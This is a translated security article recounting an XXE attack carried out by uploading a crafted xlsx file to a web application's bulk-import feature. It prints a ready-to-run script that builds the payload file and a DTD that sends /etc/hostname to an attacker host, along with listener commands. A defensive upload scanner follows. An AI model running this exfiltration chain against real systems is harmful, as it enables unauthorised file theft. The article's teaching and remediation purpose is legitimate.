2025-01-18 Update From: SLTechnology News&Howtos shulou
Shulou (Shulou.com) 06/01 Report
This article explains how an Excel file upload can be used to carry out an XXE attack. The technique is not widely known, so the process is summarized below in the hope that readers take something away from it.
During one test, an XXE attack was triggered by uploading an Excel file in the administration back end of a system. This approach is rarely used successfully, so the test process is recorded here.
Preface
Starting with Office 2007, Microsoft Office uses the Office Open XML file formats. A file in this format is a ZIP package that consists of many parts.
Unzipping it into a folder shows the folders and files it contains; most of them are XML files that describe the workbook data, metadata and document properties.
Any application that reads these Office 2007+ files with an XML parser that resolves external entities is therefore exposed to XXE.
Testing process
Both the test client and the test target sit on an isolated intranet.
Test target IP:29.xx.xx.xxx
Client IP:10.xx.xx.xx
In the Personnel Management > Batch Import module, personnel records can be imported in bulk by uploading an Excel file.
Download the import template; it is an .xls file.
xls differs from xlsx: xls is Microsoft's legacy binary format, whose core structure is an OLE compound document, while xlsx is a ZIP package whose core structure is XML. The XML payload therefore cannot be inserted into an xls file.
Since the default template user.xls provided by the system cannot carry the payload, can we create a new xlsx file and upload that instead?
Make an xlsx file with the payload inserted
Create a new xlsx file, test.xlsx, and extract it.
Insert the payload into the [Content_Types].xml file, as shown in the screenshot. Its function is to load the eval.dtd file from 10.xx.xx.xx:8080.
Listen on the client side
The eval.dtd file is hosted on the client, as shown in the following screenshot. Its function is to read the test target's /etc/hostname through the file protocol and carry the result out in parameter p of an HTTP request.
Start a web service on port 8080 of the client so that the test target can download eval.dtd.
Use nc to listen on local port 8081 to receive the /etc/hostname contents read from the test target.
Upload
Recompress the extracted files containing the payload, then rename the archive's extension to .xlsx.
Upload the xlsx file.
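The steps above, as an added worked example that is not code from the original article: a script that assembles the payload-carrying xlsx in memory and writes the eval.dtd that the client serves. The article's screenshots are not reproduced, so the exact payload text, the attacker address 10.0.0.2 and the ports are assumptions; the payload follows the usual out-of-band parameter-entity pattern, which fits the behaviour the article describes (eval.dtd is fetched from port 8080, the file contents arrive in parameter p on port 8081).

```python
import io
import zipfile

# Assumed lab addresses for the example (placeholders, not the article's redacted ones).
ATTACKER_HOST = "10.0.0.2"
DTD_PORT = 8080    # web service on the client that serves eval.dtd
EXFIL_PORT = 8081  # nc listener on the client that receives the file contents

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
OFFDOC = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def content_types_part(attacker_host: str = ATTACKER_HOST, dtd_port: int = DTD_PORT) -> str:
    """[Content_Types].xml with a DOCTYPE prepended to the normal part body.

    %remote; makes an entity-resolving parser fetch eval.dtd from the client;
    %send; then fires the entity that eval.dtd declares, which carries the
    target file out over HTTP. A parser with external entities disabled
    makes no request at all (it either ignores or rejects the DOCTYPE).
    """
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types [
  <!ENTITY % remote SYSTEM "http://{attacker_host}:{dtd_port}/eval.dtd">
  %remote;
  %send;
]>
<Types xmlns="{CT_NS}">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
  <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
</Types>
"""


def eval_dtd(target_file: str = "/etc/hostname",
             attacker_host: str = ATTACKER_HOST, exfil_port: int = EXFIL_PORT) -> str:
    """Body of eval.dtd, served from the client's web service (assumed form).

    %file reads the target file through the file protocol. %int declares a
    second entity, %send, whose SYSTEM URL embeds %file in query parameter p;
    the nested declaration needs &#x25; for '%' because a literal '%' inside
    an entity value is itself a parameter-entity reference. %int; at the end
    performs that declaration, and the %send; left in the document fires it.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % int "<!ENTITY &#x25; send SYSTEM '
        f"'http://{attacker_host}:{exfil_port}/?p=%file;'\">\n"
        "%int;\n"
    )


def minimal_workbook_parts() -> dict[str, str]:
    """Smallest set of additional parts that makes the ZIP a one-sheet workbook."""
    return {
        "_rels/.rels":
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OFFDOC}/officeDocument" Target="xl/workbook.xml"/>'
            '</Relationships>',
        "xl/workbook.xml":
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<workbook xmlns="{SML_NS}" xmlns:r="{OFFDOC}">'
            '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>',
        "xl/_rels/workbook.xml.rels":
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OFFDOC}/worksheet" Target="worksheets/sheet1.xml"/>'
            '</Relationships>',
        "xl/worksheets/sheet1.xml":
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<worksheet xmlns="{SML_NS}"><sheetData><row r="1">'
            '<c r="A1" t="inlineStr"><is><t>test</t></is></c></row></sheetData></worksheet>',
    }


def build_malicious_xlsx(attacker_host: str = ATTACKER_HOST) -> bytes:
    """Assemble the package in memory; the same thing the article does with a zip tool."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_part(attacker_host))
        for name, body in minimal_workbook_parts().items():
            zf.writestr(name, body)
    return buf.getvalue()


def package_parts(xlsx_bytes: bytes) -> dict[str, bytes]:
    """Read every part back out so the result can be inspected."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


if __name__ == "__main__":
    with open("test.xlsx", "wb") as f:
        f.write(build_malicious_xlsx())
    with open("eval.dtd", "w") as f:
        f.write(eval_dtd())
    print("wrote test.xlsx and eval.dtd")
```

Run the script, serve eval.dtd from the same directory on port 8080 (for instance with `python3 -m http.server 8080`), start `nc -lvnp 8081`, and upload test.xlsx. Two things to keep in mind: the exfiltrated contents travel in a URL, so the technique works cleanly only for a short single-line file such as /etc/hostname; and because the DOCTYPE sits in [Content_Types].xml, any parser that rejects DTDs outright will make the import fail without a single outbound request, which is exactly the behaviour a hardened library should show.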
Although the response reported that the file import had failed, the client's web service log showed that the test target had downloaded eval.dtd, and nc received the contents of the target's /etc/hostname on port 8081.
Carrying out an XXE attack through Excel is very simple. Whenever Excel files are parsed with an older version of a third-party library whose XML parser still resolves external entities, the XXE problem is introduced; the fix is to upgrade the library or to disable DTD and external entity processing in the parser it uses.
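For the defending side of the conclusion above, an added example (not code from the article): a pre-check that an import handler can run on an uploaded package before any spreadsheet library sees it. No legitimate Office Open XML part carries a DOCTYPE or entity declaration, so the check rejects the upload if one appears in any XML or .rels part. It combines a quick byte-level scan with a parse under Python's stdlib expat that aborts at the first DOCTYPE; the second pass matters because a part stored as UTF-16 defeats an ASCII regex while the parser still decodes it. The sample packages are constructed inline; the address 10.0.0.2 is a placeholder.

```python
import io
import re
import zipfile
from xml.parsers import expat

# A legitimate OOXML part never carries a DOCTYPE or an entity declaration,
# so either marker in any XML or .rels part is enough to reject the upload.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


class DtdFound(Exception):
    """Raised from the expat handler as soon as a DOCTYPE declaration starts."""


def part_declares_doctype(xml_bytes: bytes) -> bool:
    """Parse one part with expat and stop at the first DOCTYPE.

    expat decodes the document itself (BOM and encoding declaration), so a
    UTF-16 part that hides '<!DOCTYPE' from a byte regex is still caught. No
    ExternalEntityRefHandler is installed, so nothing is fetched while parsing.
    Malformed XML is treated as untrusted as well.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdFound(name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except DtdFound:
        return True
    except expat.ExpatError:
        return True
    return False


def scan_ooxml_package(data: bytes) -> dict[str, str]:
    """Return {part_name: reason} for every XML/.rels part that should block the import."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            raw = zf.read(name)
            if DTD_MARKERS.search(raw):
                findings[name] = "dtd-marker-in-bytes"
            elif part_declares_doctype(raw):
                findings[name] = "doctype-seen-by-parser"
    return findings


def make_package(parts: dict[str, bytes]) -> bytes:
    """Constructed sample package: just enough of a ZIP to exercise the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed sample parts (not taken from the article's screenshots).
TYPES_BODY = (
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/></Types>'
)
DOCTYPE = '<!DOCTYPE x [<!ENTITY % r SYSTEM "http://10.0.0.2:8080/eval.dtd">%r;]>'
CLEAN_TYPES = ('<?xml version="1.0" encoding="UTF-8"?>' + TYPES_BODY).encode("utf-8")
TAINTED_TYPES = ('<?xml version="1.0" encoding="UTF-8"?>' + DOCTYPE + TYPES_BODY).encode("utf-8")
# Same payload stored as UTF-16 with a BOM: the byte regex cannot see it.
TAINTED_TYPES_UTF16 = ('<?xml version="1.0" encoding="UTF-16"?>' + DOCTYPE + TYPES_BODY).encode("utf-16")


if __name__ == "__main__":
    for label, part in (("clean", CLEAN_TYPES), ("tainted", TAINTED_TYPES), ("tainted-utf16", TAINTED_TYPES_UTF16)):
        print(label, scan_ooxml_package(make_package({"[Content_Types].xml": part})))
```

Rejecting the upload is the right outcome here; a check that merely strips the DOCTYPE and continues would still hand attacker-shaped input to a parser whose configuration you do not control. The scan covers the package as a whole, so a payload placed in a worksheet, a .rels file or sharedStrings.xml is caught the same way as one in [Content_Types].xml.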